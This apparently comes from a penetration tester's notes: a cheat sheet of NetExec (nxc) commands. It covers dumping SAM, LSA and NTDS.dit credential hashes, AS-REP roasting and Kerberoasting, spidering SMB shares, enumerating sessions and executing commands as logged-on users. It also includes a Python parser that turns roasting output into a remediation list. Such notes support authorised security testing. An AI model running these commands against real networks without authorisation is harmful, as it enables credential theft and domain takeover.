NetExec


Last updated 1 year ago

NetExec (a.k.a. nxc) is a network service exploitation tool that helps automate assessing the security of large networks. It is based on CrackMapExec, so the tool is familiar to use.

Personally, I think the modules from NetExec make the tool worth using.


SMB spidering shares

Spider and export all files from shares:

nxc smb 10.10.10.10 -u 'user' -p 'pass' -M spider_plus -o DOWNLOAD_FLAG=True

List all readable files:

nxc smb 10.10.10.10 -u 'user' -p 'pass' -M spider_plus

Dumping hashes

Dumping SAM:

nxc smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --sam

Dumping LSA:

nxc smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --lsa

Dumping from NTDS.dit:

nxc smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds
nxc smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds --users
nxc smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds --users --enabled
nxc smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds vss

Bloodhound

If you have credentials, you can use nxc to collect BloodHound data (a zip of .json files) directly over LDAP:

nxc ldap <ip> -u user -p pass --bloodhound -ns <ns-ip> --collection All

AS-REP Roasting

A single user:

nxc ldap 192.168.0.104 -u harry -p '' --asreproast output.txt

A file containing a list of usernames (one per line):

nxc ldap 192.168.0.104 -u user.txt -p '' --asreproast output.txt

Kerberoasting

nxc ldap 192.168.0.104 -u harry -p pass --kerberoasting output.txt
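The `--asreproast` and `--kerberoasting` output files above contain one hashcat-style line per account. This added example (not part of the original notes or of NetExec itself) parses both files into a remediation list: accounts with Kerberos pre-authentication disabled, accounts carrying SPNs, and tickets issued with RC4 (etype 23). The line formats are assumed from the Impacket-style output nxc writes, and the sample lines are constructed.

```python
import re

# Assumed line formats (Impacket/hashcat style), as written by nxc:
#   $krb5asrep$23$user@DOMAIN:checksum$edata
#   $krb5tgs$23$*user$DOMAIN$spn*$checksum$edata        (RC4)
#   $krb5tgs$18$user$DOMAIN$*spn*$checksum$edata         (AES)
ASREP_RE = re.compile(r"^\$krb5asrep\$(?P<etype>\d+)\$(?P<user>[^@]+)@(?P<domain>[^:]+):")
TGS_RC4_RE = re.compile(r"^\$krb5tgs\$(?P<etype>\d+)\$\*(?P<user>[^$]+)\$(?P<domain>[^$]+)\$(?P<spn>[^*]+)\*\$")
TGS_AES_RE = re.compile(r"^\$krb5tgs\$(?P<etype>\d+)\$(?P<user>[^$]+)\$(?P<domain>[^$]+)\$\*(?P<spn>[^*]+)\*\$")

# Constructed sample: what a combined output.txt could look like
SAMPLE = """\
$krb5asrep$23$harry@LAB.LOCAL:0a1b2c3d$aabbccdd
$krb5tgs$23$*svc_sql$LAB.LOCAL$MSSQLSvc/sql01.lab.local:1433*$1122$3344
$krb5tgs$18$svc_web$LAB.LOCAL$*HTTP/web01.lab.local*$5566$7788
not a hash line
"""


def parse_line(line):
    """Return {'kind','etype','user','domain','spn'} or None for non-hash lines."""
    line = line.strip()
    for kind, rx in (("asrep", ASREP_RE), ("tgs", TGS_RC4_RE), ("tgs", TGS_AES_RE)):
        m = rx.match(line)
        if m:
            d = m.groupdict()
            return {"kind": kind, "etype": int(d["etype"]), "user": d["user"],
                    "domain": d["domain"], "spn": d.get("spn")}
    return None


def remediation_report(text):
    """Group parsed lines into the actions a defender needs to take."""
    report = {"enable_preauth": [], "spn_accounts": {}, "rc4_tickets": []}
    for line in text.splitlines():
        e = parse_line(line)
        if e is None:
            continue
        acct = f"{e['user']}@{e['domain']}"
        if e["kind"] == "asrep":
            report["enable_preauth"].append(acct)       # pre-auth is disabled
        else:
            report["spn_accounts"].setdefault(acct, []).append(e["spn"])
        if e["etype"] == 23:
            report["rc4_tickets"].append(acct)          # RC4 still allowed
    return report


if __name__ == "__main__":
    print(remediation_report(SAMPLE))
```

Accounts under `enable_preauth` should get "Do not require Kerberos preauthentication" cleared, and `spn_accounts` are candidates for gMSA or long random passwords; `rc4_tickets` shows where RC4 is still negotiated.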

SMB logged on users

nxc smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --loggedon-users

SMB active sessions

nxc smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --sessions

SMB Execute commands on behalf of other users

nxc smb <ip> -u <localAdmin> -p <password> -M schtask_as -o USER=<logged-on-user> CMD=<cmd-command>